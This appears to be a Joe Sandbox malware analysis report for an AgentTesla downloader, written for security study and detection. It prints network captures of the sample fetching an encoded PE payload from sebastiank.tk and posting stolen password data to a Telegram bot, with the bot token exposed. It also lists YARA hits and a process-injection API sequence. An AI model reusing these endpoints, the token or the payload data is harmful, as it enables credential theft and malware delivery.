                                                                        Data Ascii: DkC1xctBJEBqQsyBEECiQk3BGEBeRU9BMkAhSpYBMkAaA1JAckAxQcuAckAqA1dBEkCRQJwBFkCMglwBFECCTR2BEkCySmABGECzS2VBGkCWjKxBJEBERW2BGkCIiW8BKkAEgrCBHECOzHIBHECeRXOBKkAzCvTBKkAzCvZBKkBZBATACkAORskBbkCsyUqBakCZhYuAakCoC0uAaECIiUwBZkCIiUwBZECIiWYA4ECATQ2BVkClRQ7BYkCIiVB
                                                                        2022-08-08 10:54:13 UTC250INData Raw: 37 59 65 41 41 41 43 43 37 49 65 41 41 42 62 44 48 6f 65 41 41 41 77 44 57 77 50 41 41 41 4b 44 33 59 65 41 41 41 53 4b 6d 77 50 41 41 42 39 42 6f 41 65 41 41 41 53 48 59 51 65 41 41 44 5a 48 49 41 65 41 41 44 62 4b 6d 77 50 41 41 44 59 4b 6d 77 50 41 41 44 51 4c 32 77 50 41 41 43 59 49 32 77 50 41 41 43 63 44 57 77 50 41 41 44 33 44 57 77 50 41 41 44 75 43 57 77 50 41 41 42 44 4c 62 49 65 41 41 43 47 43 4c 49 65 41 41 41 30 4e 48 59 65 41 41 44 47 46 62 49 65 41 41 41 74 48 72 49 65 41 41 43 67 44 33 59 65 41 41 43 74 49 64 38 65 41 41 41 71 48 47 77 50 41 41 42 34 44 75 51 65 41 41 44 74 44 47 77 50 41 41 42 46 48 32 77 50 41 41 44 62 4d 6e 6f 65 41 41 44 50 43 4f 51 65 41 41 42 64 43 4f 51 65 41 41 44 34 45 39 73 66 41 41 41 6f 43 62 49 65 41 41 43 55
                                                                        Data Ascii: 7YeAAACC7IeAABbDHoeAAAwDWwPAAAKD3YeAAASKmwPAAB9BoAeAAASHYQeAADZHIAeAADbKmwPAADYKmwPAADQL2wPAACYI2wPAACcDWwPAAD3DWwPAADuCWwPAABDLbIeAACGCLIeAAA0NHYeAADGFbIeAAAtHrIeAACgD3YeAACtId8eAAAqHGwPAAB4DuQeAADtDGwPAABFH2wPAADbMnoeAADPCOQeAABdCOQeAAD4E9sfAAAoCbIeAACU
                                                                        2022-08-08 10:54:13 UTC258INData Raw: 58 42 6c 41 48 4e 6c 64 46 39 4e 5a 57 52 70 59 56 52 35 63 47 55 41 51 32 68 68 62 6d 64 6c 56 48 6c 77 5a 51 42 57 59 57 78 31 5a 56 52 35 63 47 55 41 55 33 52 79 61 57 35 6e 56 48 6c 77 5a 51 42 54 5a 57 4e 31 63 6d 6c 30 65 56 42 79 62 33 52 76 59 32 39 73 56 48 6c 77 5a 51 42 43 61 57 35 6b 56 47 39 55 65 58 42 6c 41 47 64 6c 64 46 39 68 64 6d 46 30 59 58 4a 55 65 58 42 6c 41 48 4e 6c 64 46 39 68 64 6d 46 30 59 58 4a 55 65 58 42 6c 41 45 64 6c 64 46 52 35 63 47 55 41 55 32 39 6a 61 32 56 30 56 48 6c 77 5a 51 42 7a 5a 58 52 66 51 32 39 75 64 47 56 75 64 46 52 35 63 47 55 41 52 6d 6c 73 5a 56 4e 6f 59 58 4a 6c 41 45 4e 76 62 58 42 68 63 6d 55 41 55 48 52 79 56 47 39 54 64 48 4a 31 59 33 52 31 63 6d 55 41 5a 32 56 30 58 30 6c 75 64 6d 46 79 61 57 46 75
                                                                        Data Ascii: XBlAHNldF9NZWRpYVR5cGUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU3RyaW5nVHlwZQBTZWN1cml0eVByb3RvY29sVHlwZQBCaW5kVG9UeXBlAGdldF9hdmF0YXJUeXBlAHNldF9hdmF0YXJUeXBlAEdldFR5cGUAU29ja2V0VHlwZQBzZXRfQ29udGVudFR5cGUARmlsZVNoYXJlAENvbXBhcmUAUHRyVG9TdHJ1Y3R1cmUAZ2V0X0ludmFyaWFu
                                                                        2022-08-08 10:54:13 UTC265INData Raw: 57 78 43 59 58 4e 70 59 79 35 4e 65 56 4e 6c 63 6e 5a 70 59 32 56 7a 41 45 64 6c 64 45 6c 75 63 33 52 68 62 6d 4e 6c 63 77 42 6e 5a 58 52 66 51 32 68 70 62 47 52 4f 62 32 52 6c 63 77 42 4e 59 58 52 6a 61 47 56 7a 41 45 64 6c 64 45 52 70 63 6d 56 6a 64 47 39 79 61 57 56 7a 41 47 64 6c 64 46 39 51 63 6d 39 77 5a 58 4a 30 61 57 56 7a 41 45 56 34 63 47 46 75 5a 45 56 75 64 6d 6c 79 62 32 35 74 5a 57 35 30 56 6d 46 79 61 57 46 69 62 47 56 7a 41 45 64 6c 64 45 5a 70 62 47 56 7a 41 45 56 75 64 57 31 51 63 6d 39 6a 5a 58 4e 7a 54 57 39 6b 64 57 78 6c 63 77 42 48 5a 58 52 4e 62 32 52 31 62 47 56 7a 41 45 35 31 62 57 4a 6c 63 6c 4e 30 65 57 78 6c 63 77 42 48 5a 58 52 54 64 57 4a 4c 5a 58 6c 4f 59 57 31 6c 63 77 42 53 5a 57 46 6b 51 57 78 73 54 47 6c 75 5a 58 4d 41
                                                                        Data Ascii: WxCYXNpYy5NeVNlcnZpY2VzAEdldEluc3RhbmNlcwBnZXRfQ2hpbGROb2RlcwBNYXRjaGVzAEdldERpcmVjdG9yaWVzAGdldF9Qcm9wZXJ0aWVzAEV4cGFuZEVudmlyb25tZW50VmFyaWFibGVzAEdldEZpbGVzAEVudW1Qcm9jZXNzTW9kdWxlcwBHZXRNb2R1bGVzAE51bWJlclN0eWxlcwBHZXRTdWJLZXlOYW1lcwBSZWFkQWxsTGluZXMA
                                                                        2022-08-08 10:54:13 UTC273INData Raw: 77 67 59 45 6f 47 64 43 41 51 41 41 51 67 59 42 51 41 42 41 68 30 46 42 51 41 43 43 51 6b 4a 43 51 41 45 41 68 67 64 43 51 6b 51 43 51 49 71 43 41 45 49 43 51 41 45 43 52 67 59 45 6f 47 64 43 41 59 41 41 67 67 59 45 41 67 45 41 41 45 49 43 41 30 41 42 77 67 4a 43 52 30 46 45 6f 47 64 43 41 6b 59 41 52 55 52 42 77 6f 4f 43 52 4a 70 48 51 6b 53 5a 51 6b 49 43 42 4b 42 6e 51 67 46 41 41 45 53 5a 51 67 46 41 41 45 49 45 6a 55 44 49 41 41 59 42 41 41 42 47 41 6f 49 42 77 55 4f 44 67 34 4f 45 6d 6b 47 41 41 45 53 67 66 55 4f 43 41 63 45 45 6f 47 64 44 67 67 49 43 41 63 44 45 59 45 35 48 51 34 49 41 77 41 41 41 67 63 48 42 51 34 43 43 41 67 49 42 51 63 43 44 68 4a 70 42 43 41 42 44 67 67 46 49 41 41 53 67 66 6b 47 41 41 45 42 45 59 48 39 44 77 63 4a 44 67 67 64
                                                                        Data Ascii: wgYEoGdCAQAAQgYBQABAh0FBQACCQkJCQAEAhgdCQkQCQIqCAEICQAECRgYEoGdCAYAAggYEAgEAAEICA0ABwgJCR0FEoGdCAkYARURBwoOCRJpHQkSZQkICBKBnQgFAAESZQgFAAEIEjUDIAAYBAABGAoIBwUODg4OEmkGAAESgfUOCAcEEoGdDggICAcDEYE5HQ4IAwAAAgcHBQ4CCAgIBQcCDhJpBCABDggFIAASgfkGAAEBEYH9DwcJDggd
                                                                        2022-08-08 10:54:13 UTC281INData Raw: 51 63 4b 41 67 6f 49 43 42 77 64 42 51 67 49 43 41 67 46 49 41 49 4b 43 41 67 45 49 41 45 43 43 67 63 48 42 51 73 4c 43 41 67 49 42 53 41 43 43 77 67 49 46 51 63 51 43 77 63 49 48 51 6f 49 43 68 77 4b 48 41 67 48 45 59 4f 42 43 41 67 49 43 41 51 41 41 51 73 63 42 43 41 42 41 51 73 4c 41 41 49 52 67 34 45 52 67 34 45 52 67 34 45 47 41 41 45 49 45 59 4f 42 43 51 41 43 43 42 47 44 67 52 47 44 67 51 51 47 45 59 4f 42 42 67 41 42 43 78 47 44 67 51 59 41 41 51 63 52 67 34 45 4c 41 41 49 53 67 67 55 53 67 67 55 53 67 67 55 45 48 52 47 41 72 42 6b 48 46 41 49 4c 48 41 67 49 48 52 47 41 70 41 67 63 43 68 77 4b 43 68 77 49 42 77 63 49 43 41 67 49 42 42 30 52 67 4b 67 45 48 52 47 41 70 41 51 41 41 51 34 4c 42 43 41 42 41 67 73 55 42 77 30 64 48 41 67 43 43 41 67 63
                                                                        Data Ascii: QcKAgoICBwdBQgICAgFIAIKCAgEIAECCgcHBQsLCAgIBSACCwgIFQcQCwcIHQoIChwKHAgHEYOBCAgICAQAAQscBCABAQsLAAIRg4ERg4ERg4EGAAEIEYOBCQACCBGDgRGDgQQGEYOBBgABCxGDgQYAAQcRg4ELAAISggUSggUSggUEHRGArBkHFAILHAgIHRGApAgcChwKChwIBwcICAgIBB0RgKgEHRGApAQAAQ4LBCABAgsUBw0dHAgCCAgc


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.449756162.240.35.239443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2022-08-08 10:54:14 UTC288OUTGET /devv/DLLL.txt HTTP/1.1
                                                                        Host: sebastiank.tk
                                                                        2022-08-08 10:54:14 UTC289INHTTP/1.1 200 OK
                                                                        Date: Mon, 08 Aug 2022 10:54:13 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Mon, 08 Aug 2022 06:49:17 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 20480
                                                                        Content-Type: text/plain
                                                                        2022-08-08 10:54:14 UTC289INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 43 78 38 47 49 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 44 51 41 41 41 41 34 41 41 41 41 41 41 41 41 30 6c 4d 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABCx8GIAAAAAAAAAAOAADiELATAAADQAAAA4AAAAAAAA0lMAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                                                        2022-08-08 10:54:14 UTC297INData Raw: 41 41 4d 41 44 34 4a 77 41 41 41 41 43 54 41 4d 77 4f 68 51 41 78 41 42 51 6f 41 41 41 41 41 4a 4d 41 37 67 36 4b 41 44 49 41 33 43 67 41 41 41 41 41 6b 52 67 39 44 6d 34 41 4e 41 42 49 4b 51 41 41 41 41 43 47 47 41 4d 4c 63 67 41 30 41 46 77 70 41 41 41 41 41 4a 4d 41 4d 67 2b 52 41 44 51 41 55 43 6f 41 41 41 41 41 6b 52 67 39 44 6d 34 41 4e 51 43 6f 4b 67 41 41 41 41 43 47 47 41 4d 4c 63 67 41 31 41 4c 77 71 41 41 41 41 41 4a 45 41 2f 67 2b 67 41 44 55 41 41 43 73 41 41 41 41 41 6b 51 42 43 45 4b 59 41 4e 67 44 55 4b 77 41 41 41 41 43 54 41 47 51 51 72 51 41 33 41 42 51 73 41 41 41 41 41 4a 4d 41 71 42 43 30 41 44 67 41 54 43 77 41 41 41 41 41 6b 77 44 4b 45 4c 77 41 4f 67 43 49 4c 77 41 41 41 41 43 52 41 44 41 52 62 67 41 38 41 49 77 76 41 41 41 41 41
                                                                        Data Ascii: AAMAD4JwAAAACTAMwOhQAxABQoAAAAAJMA7g6KADIA3CgAAAAAkRg9Dm4ANABIKQAAAACGGAMLcgA0AFwpAAAAAJMAMg+RADQAUCoAAAAAkRg9Dm4ANQCoKgAAAACGGAMLcgA1ALwqAAAAAJEA/g+gADUAACsAAAAAkQBCEKYANgDUKwAAAACTAGQQrQA3ABQsAAAAAJMAqBC0ADgATCwAAAAAkwDKELwAOgCILwAAAACRADARbgA8AIwvAAAAA
                                                                        2022-08-08 10:54:14 UTC304INData Raw: 46 6b 55 48 4a 76 59 32 56 7a 63 30 31 6c 62 57 39 79 65 51 42 58 63 6d 6c 30 5a 56 42 79 62 32 4e 6c 63 33 4e 4e 5a 57 31 76 63 6e 6b 41 56 57 35 74 59 58 42 57 61 57 56 33 54 32 5a 54 5a 57 4e 30 61 57 39 75 41 46 5a 70 63 6e 52 31 59 57 78 42 62 47 78 76 59 30 56 34 41 46 4a 6c 63 33 56 74 5a 56 52 6f 63 6d 56 68 5a 41 42 47 62 33 4a 74 59 58 51 41 52 32 56 30 56 48 6c 77 5a 55 5a 79 62 32 31 49 59 57 35 6b 62 47 55 41 55 32 6c 36 5a 55 39 6d 41 46 52 76 56 55 6c 75 64 44 4d 79 41 45 6c 7a 54 6e 56 73 62 45 39 79 52 57 31 77 64 48 6b 41 51 32 39 75 59 32 46 30 41 46 70 6c 63 6d 38 41 56 47 39 4a 62 6e 51 7a 4d 67 42 6e 5a 58 52 66 55 32 6c 36 5a 51 42 55 62 30 6c 75 64 44 45 32 41 45 4a 73 62 32 4e 72 51 32 39 77 65 51 42 48 5a 58 52 43 65 58 52 6c 63
                                                                        Data Ascii: FkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAVW5tYXBWaWV3T2ZTZWN0aW9uAFZpcnR1YWxBbGxvY0V4AFJlc3VtZVRocmVhZABGb3JtYXQAR2V0VHlwZUZyb21IYW5kbGUAU2l6ZU9mAFRvVUludDMyAElzTnVsbE9yRW1wdHkAQ29uY2F0AFplcm8AVG9JbnQzMgBnZXRfU2l6ZQBUb0ludDE2AEJsb2NrQ29weQBHZXRCeXRlc


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.449855149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2022-08-08 10:56:04 UTC309OUTPOST /bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da79575956deb2
                                                                        Host: api.telegram.org
                                                                        Content-Length: 1001
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2022-08-08 10:56:04 UTC309INHTTP/1.1 100 Continue
                                                                        2022-08-08 10:56:04 UTC309OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 35 37 35 39 35 36 64 65 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 34 31 30 38 39 37 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 35 37 35 39 35 36 64 65 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 39 33 36 39 30 35 0a 4f 53 46 75 6c 6c
                                                                        Data Ascii: -----------------------------8da79575956deb2Content-Disposition: form-data; name="chat_id"5041089746-----------------------------8da79575956deb2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/936905OSFull
                                                                        2022-08-08 10:56:04 UTC310INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Mon, 08 Aug 2022 10:56:04 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 628
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        {"ok":true,"result":{"message_id":257686,"from":{"id":5083863399,"is_bot":true,"first_name":"kay","username":"kaywins_bot"},"chat":{"id":5041089746,"first_name":"Popo","last_name":"Popo","username":"popo2024","type":"private"},"date":1659956164,"document":{"file_name":"user-936905 2022-08-08 04-01-14.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAED7pZi8OvEfd09A4hIrHojV1M0GDk-VgACjAIAAhJNgEfNmzcRlb3_gikE","file_unique_id":"AgADjAIAAhJNgEc","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/936905\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:12:54:09
                                                                        Start date:08/08/2022
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe"
                                                                        Imagebase:0x200000
                                                                        File size:246304 bytes
                                                                        MD5 hash:36C6DDDAA5FB7F14E221C8FA3BDA0D92
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low

                                                                        Target ID:3
                                                                        Start time:12:54:14
                                                                        Start date:08/08/2022
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        Imagebase:0xd00000
                                                                        File size:43176 bytes
                                                                        MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:moderate

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:21.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:33
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 3635 a5c704 3636 a5c70d ReadProcessMemory 3635->3636 3638 a5cbd7 3636->3638 3621 a5c600 3622 a5c666 3621->3622 3623 a5c67b SetThreadContext 3621->3623 3622->3623 3624 a5c6c4 3623->3624 3625 a5ce70 ResumeThread 3626 a5cf00 3625->3626 3631 a5cd30 3632 a5cdb6 WriteProcessMemory 3631->3632 3633 a5cda1 3631->3633 3634 a5ce18 3632->3634 3633->3632 3627 a5c27c 3628 a5c315 CreateProcessW 3627->3628 3630 a5c47c 3628->3630 3630->3630 3601 a5c288 3602 a5c315 CreateProcessW 3601->3602 3604 a5c47c 3602->3604 3604->3604 3605 a5cc28 VirtualAllocEx 3606 a5cce7 3605->3606 3607 a5c608 3608 a5c666 3607->3608 3609 a5c67b SetThreadContext 3607->3609 3608->3609 3610 a5c6c4 3609->3610 3613 a5ce78 ResumeThread 3614 a5cf00 3613->3614 3615 a5cd38 3616 a5cdb6 WriteProcessMemory 3615->3616 3617 a5cda1 3615->3617 3618 a5ce18 3616->3618 3617->3616 3619 a5cb18 ReadProcessMemory 3620 a5cbd7 3619->3620

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 a535a8-a535cd 1 a535d4-a53612 call a53bd1 0->1 2 a535cf 0->2 4 a53618 1->4 2->1 5 a5361f-a5363b 4->5 6 a53644-a53645 5->6 7 a5363d 5->7 8 a539c9-a539d0 6->8 9 a5364a-a53661 6->9 7->4 7->8 7->9 10 a53724-a53738 7->10 11 a536c1-a536ef 7->11 12 a53663-a5366f 7->12 13 a5376d-a5377a 7->13 14 a537ac-a537b8 7->14 15 a53909-a53912 7->15 16 a5386b-a5386f 7->16 17 a536f4-a536f8 7->17 18 a53854-a53866 7->18 19 a53694-a536a0 7->19 20 a53817-a5382c 7->20 21 a53996-a539ad 7->21 22 a53971-a53977 7->22 23 a53831-a5384f 7->23 24 a539b2-a539c4 7->24 25 a5373d-a53741 7->25 26 a537fd-a53812 7->26 27 a5377f-a5378b 7->27 28 a5393e-a53955 7->28 29 a5389b-a538a7 7->29 30 a5395a-a5396c 7->30 9->5 10->5 11->5 37 a53676-a53692 12->37 38 a53671 12->38 13->5 35 a537bf-a537d5 14->35 36 a537ba 14->36 39 a53925-a5392c 15->39 40 a53914-a53923 15->40 43 a53871-a53880 16->43 44 a53882-a53889 16->44 45 a5370b-a53712 17->45 46 a536fa-a53709 17->46 18->5 41 a536a7-a536bc 19->41 42 a536a2 19->42 20->5 21->5 53 a5397f-a53991 22->53 23->5 24->5 31 a53754-a5375b 25->31 32 a53743-a53752 25->32 26->5 33 a53792-a537a7 27->33 34 a5378d 27->34 28->5 47 a538ae-a538c4 29->47 48 a538a9 29->48 30->5 49 a53762-a53768 31->49 32->49 33->5 34->33 63 a537d7 35->63 64 a537dc-a537f8 35->64 36->35 37->5 38->37 52 a53933-a53939 39->52 40->52 41->5 42->41 50 a53890-a53896 43->50 44->50 51 a53719-a5371f 45->51 46->51 61 a538c6 47->61 62 a538cb-a538e1 47->62 48->47 49->5 50->5 51->5 52->5 53->5 61->62 68 a538e3 62->68 69 a538e8-a53904 62->69 63->64 64->5 68->69 69->5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.244790725.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_a50000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,Z%k$,Z%k$Mgr$a)*]$a)*]$z"L$
                                                                          • API String ID: 0-3977090318
                                                                          • Opcode ID: fc976faa8c2a76993e21f0e035014920d94388c62772e348a731a1f0deb1a139
                                                                          • Instruction ID: 59e0d7c50707f6f0ae728745327a49dbaebde552e27e99c66a76569ce270b927
                                                                          • Opcode Fuzzy Hash: fc976faa8c2a76993e21f0e035014920d94388c62772e348a731a1f0deb1a139
                                                                          • Instruction Fuzzy Hash: B6D12EB1E0420ADFCB04CFA6D4818AEFBB2FF88341B24D559D915AB714D7349A46CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
